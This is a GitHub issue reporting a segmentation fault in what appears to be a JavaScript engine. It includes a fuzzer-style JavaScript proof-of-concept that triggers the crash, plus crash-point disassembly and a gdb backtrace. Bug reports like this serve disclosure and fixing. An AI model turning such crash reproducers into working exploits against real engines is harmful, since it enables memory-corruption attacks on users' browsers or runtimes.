Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Segmentation fault #6643

Open
bird8693 opened this issue Mar 17, 2021 · 0 comments
Open

Segmentation fault #6643

bird8693 opened this issue Mar 17, 2021 · 0 comments

Comments

@bird8693
Copy link

enviroment

ubuntu 16

poc

function main() {
    var HWyR = 268435456 <= 9007199254740991;
    let arr = [
        1.1,
        2.2,
        3.3
    ];
    for (let i = 0; i < 65536; i++) {
        opt();
    }
    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
    var aKGJ = Symbol;
    print(opt());
}
var r = new Object();
var r = new Object();
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
    var nrYB = Symbol;
}
let arr = [];
var CollectGarbage = new Object();
var r = new Object();
var Mchh = vars >= r;
var vars = [];
var r = new Object();
JSON.parse(null);
once = CollectGarbage != 1.3;
var ThnA = +9007199254740994;
var PHrh = -9007199254740991;
once = true;
var Jknd = Date;
var r = new Object();
var YQZc = +0.1;
var CollectGarbage = new Object();
for (var Rjsi = new Uint32Array([1200]); i < 20000; i++) {
    vars[-1] = 'aaaaa';
}
var r = new Object();
r.lastIndex = 'aaaaa';
once = CollectGarbage != 1.3;
r.lastIndex = 'aaaaa';
for (var i = 20000; i < 40000; i++) {
    vars[vars.length] = 'aaaaa';
    var xxKn = 3.141592653589793 * 1e-81;
    for (var i = 20000; i < 40000; i++) {
        vars[i] = ' \'\' ';
        var JfHf = CollectGarbage ** r + 1073741825;
        vars = !NaN;
        Array.prototype.length = 0;
    }
    for (var i = 20000; i < 40000; i++) {
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            var Jknd = Date;
        }
        once = Mchh.valueOf();
        var HWyR = 268435456 <= 9007199254740991;
        var dmdd = CollectGarbage % 1200;
        var dmdd = CollectGarbage % 1200;
        vars[-1] = 'aaaaa';
        var CollectGarbage = new Object();
        var SSsr = 2147483649 + -4294967297;
        var Rjsi = new Uint32Array([1200]);
        once = Mchh.valueOf();
        var cJjF = delete NaN;
        var nmMt = new Set([3.141592653589793]);
        var chhy = new RegExp(null);
        var dmdd = CollectGarbage % 1200;
        var RjjJ = -1;
        once = CollectGarbage != 1.3;
        var winE = Promise;
    }
    var dmdd = CollectGarbage % 1200;
    vars[-1] = 'aaaaa';
    once = Mchh.valueOf();
    vars[vars.length] = 'aaaaa';
    var r = new Object();
    var nmMt = new Set([3.141592653589793]);
    var Mchh = vars >= r;
}
var dmdd = CollectGarbage % 1200;
var sRcZ = Proxy;

output

command line output

Segmentation fault (core dumped)

crash point

   0x7ff7f2f932de                  push   0x48ca8b48
   0x7ff7f2f932e3                  shr    ecx, 0x30
   0x7ff7f2f932e6                  jne    0x7ff7f2f93cc9
 → 0x7ff7f2f932ec                  mov    rcx, QWORD PTR [rdx+0x8]
   0x7ff7f2f932f0                  xor    edi, edi
   0x7ff7f2f932f2                  cmp    rcx, QWORD PTR [r13+0x480]
   0x7ff7f2f932f9                  jne    0x7ff7f2f93ce5
   0x7ff7f2f932ff                  cmovne rdx, rdi
   0x7ff7f2f93303                  mov    rdi, QWORD PTR [r15+0x4d0dc]

callstack

gef➤ bt
#0 0x00007ff7f2f932ec in ?? ()
#1 0x0000555500000002 in ?? ()
#2 0x00007ff7f2f1f480 in ?? ()
#3 0x00005555573d9d20 in LegalInstrFormsImpl::LEGAL_N_R_R ()
#4 0x00007ffff695b53c in __GI___libc_free (mem=) at malloc.c:2968
#5 0x00007fffffffd220 in ?? ()
#6 0x00007ffff7fc37a8 in ?? ()
#7 0x0000000000000000 in ?? ()
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bird8693